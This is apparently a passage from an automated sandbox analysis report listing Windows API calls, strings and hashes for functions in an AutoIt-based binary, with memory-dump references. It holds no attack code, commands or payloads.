                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 7d0e3f81fa1c5c6ac7bcddf1e1c73474180ddf5354d473046d5c6e287f1682f7
                                                                                                                                                                                                                                      • Instruction ID: 681943c3dd01d604dea592fd60321296cb941daa34cbcb3022246e5cfe55298a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d0e3f81fa1c5c6ac7bcddf1e1c73474180ddf5354d473046d5c6e287f1682f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C912B13050A201DFD725CF18D888BFABBE2FF84314F55A469F489ABA61C731E851DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00EE2F97
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EE30C3
                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00EE3102
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EE3112
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00EE3159
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00EE3165
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00EE31AE
                                                                                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EE31BD
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00EE31CD
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EE31D1
                                                                                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00EE31E1
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE31EA
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00EE31F3
                                                                                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EE321F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EE3236
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00EE3276
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EE328A
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EE329B
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00EE32D0
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00EE32DB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EE32E6
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00EE32F0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                      • Opcode ID: 797ecc6d32702ef39492f29cebfe5da9acf52c727b7313149a12849c2f566e54
                                                                                                                                                                                                                                      • Instruction ID: 3f13a75a86d20109b1a536ded32828ffc33af4d6630a168fe51520e278de8fd6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 797ecc6d32702ef39492f29cebfe5da9acf52c727b7313149a12849c2f566e54
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41B16E71A40209AFEB14DF69DC49FAEBBBAEB44714F008115FA14F7290D774AD40DB64
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ED533D
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00EFDC44,?,\\.\,00EFDCD0), ref: 00ED541A
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00EFDC44,?,\\.\,00EFDCD0), ref: 00ED5586
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                      • Opcode ID: 8a551f23c91be295b3358f255772800dd7fd8de7c81f11b0e3febbc7ae8fd801
                                                                                                                                                                                                                                      • Instruction ID: 3aacb348c21e5410a690d51ec0d448f1a1567d47e40d94e745998292ef1cc5bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a551f23c91be295b3358f255772800dd7fd8de7c81f11b0e3febbc7ae8fd801
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5161A132648A059FCB05EF24E9829F9B7A2EF44304B64615BE407BB352C671EE43DB42
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00EF7C21
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00EF7C25
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EF7C3B
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00EF7C46
                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 00EF7C4B
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00EF7C63
                                                                                                                                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EF7C71
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00EF7C82
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00EF7C8B
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EF7C98
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EF7CB7
                                                                                                                                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EF7CCE
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EF7CDB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EF7D2A
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EF7D54
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00EF7D72
                                                                                                                                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 00EF7D7D
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00EF7D8E
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00EF7D96
                                                                                                                                                                                                                                      • DrawTextW.USER32(?,00EF78F5,000000FF,?,00000000), ref: 00EF7DA8
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EF7DBF
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00EF7DCA
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EF7DD0
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00EF7DD5
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00EF7DDB
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00EF7DE5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                                                                                      • Opcode ID: 92a0ebdb5fd59cddfb3419c7242a7f59f6c0d410b8d1da6721d7fa08c51e74ef
                                                                                                                                                                                                                                      • Instruction ID: b58bbb90d76815ad3f6e882591ae970a8169b0c38cbe5b64c4ab0bebacf56870
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92a0ebdb5fd59cddfb3419c7242a7f59f6c0d410b8d1da6721d7fa08c51e74ef
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F617872904218AFDB019FA5DC48EFEBFBAEF48320F214115FA15BB2A0D7719944CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EF198D
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EF19A2
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EF19A9
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF19FE
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00EF1A1E
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EF1A52
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF1A70
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EF1A82
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00EF1A97
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00EF1AAA
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 00EF1B06
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00EF1B21
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00EF1B35
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EF1B4D
                                                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00EF1B73
                                                                                                                                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00EF1B8D
                                                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00EF1BA4
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00EF1C0F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                      • Opcode ID: f3b2095abd213a83092d76243460a0885f70c686ff65f2b5aa064c4fbebd23d7
                                                                                                                                                                                                                                      • Instruction ID: 882ed3e1090f98a84384ca7d1e196b2e12835e86928157a1e078f856372e8779
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3b2095abd213a83092d76243460a0885f70c686ff65f2b5aa064c4fbebd23d7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CB1CC71608344EFD704DF29C884B6ABBE5FF84344F00995DFA99AB2A1D770E845CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E6152D
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00E61535
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E61560
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00E61568
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00E6158D
                                                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E615AA
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E615BA
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E615ED
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E61601
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00E6161F
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00E6163B
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E61646
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: GetCursorPos.USER32(?), ref: 00E6136E
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: ScreenToClient.USER32(00000000,?), ref: 00E6138B
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: GetAsyncKeyState.USER32(00000001), ref: 00E613C2
                                                                                                                                                                                                                                        • Part of subcall function 00E6135A: GetAsyncKeyState.USER32(00000002), ref: 00E613DC
                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00E793F1), ref: 00E6166D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                      • Opcode ID: 140ceec62cc4d96b49aea808d1a8ab850928187b3a8d1e84887c86646c1d259c
                                                                                                                                                                                                                                      • Instruction ID: ff95bfe353b1621e8a86479d5888f634c84ee62cf2ff79b888f4fef073082fa8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 140ceec62cc4d96b49aea808d1a8ab850928187b3a8d1e84887c86646c1d259c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBB18971A4020ADFDB15DFA9DC45BAE7BB6EB88314F014129FA15BB2A0CB34E840DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC179E
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17AA
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17B9
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EC1225,?,?,?), ref: 00EC17C0
                                                                                                                                                                                                                                        • Part of subcall function 00EC1783: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC17D7
                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC147F
                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC14B3
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC14CA
                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EC1504
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC1520
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EC1537
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00EC153F
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EC1546
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC1567
                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00EC156E
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC159D
                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC15BF
                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC15D1
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC15F8
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC15FF
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC1608
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC160F
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC1618
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC161F
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC162B
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00EC1632
                                                                                                                                                                                                                                        • Part of subcall function 00EC181D: GetProcessHeap.KERNEL32(00000008,00EC123B,?,00000000,?,00EC123B,?), ref: 00EC182B
                                                                                                                                                                                                                                        • Part of subcall function 00EC181D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00EC123B,?), ref: 00EC1832
                                                                                                                                                                                                                                        • Part of subcall function 00EC181D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00EC123B,?), ref: 00EC1841
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                      • Opcode ID: be3aa34380040180df7d771eb55d054dd7e2d9141f60c6fa6cc4bf13f320a5cb
                                                                                                                                                                                                                                      • Instruction ID: caa3f8cebc5c8c4ef29b14ea0180c4b7f5f9c137181d22fdfc8dcfa409ca5637
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be3aa34380040180df7d771eb55d054dd7e2d9141f60c6fa6cc4bf13f320a5cb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C71AAB2904209AFDF109FA1DD44FEEBBB9BF85314F044159E915F7291DB329A06CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00EF0B4A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EF0D2A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EF0D69
                                                                                                                                                                                                                                        • Part of subcall function 00EC28C9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC28E2
                                                                                                                                                                                                                                        • Part of subcall function 00EC28C9: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC2914
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpper
                                                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                      • API String ID: 3391685005-719923060
                                                                                                                                                                                                                                      • Opcode ID: 8f1a2c44e26991f55a8bd74c7a590faae7bb2fdf2d8b20d541d060a259397202
                                                                                                                                                                                                                                      • Instruction ID: 9002dbd61e2cf231a3bc812506f7984c97a95ce72ebb35c72a80313eea3ca603
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f1a2c44e26991f55a8bd74c7a590faae7bb2fdf2d8b20d541d060a259397202
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9E1C1312083058FCB14DF24C99093AB7E5FF88358B14A95DF99ABB292DB30ED46CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00EE0680
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00EE068B
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00EE0696
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00EE06A1
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00EE06AC
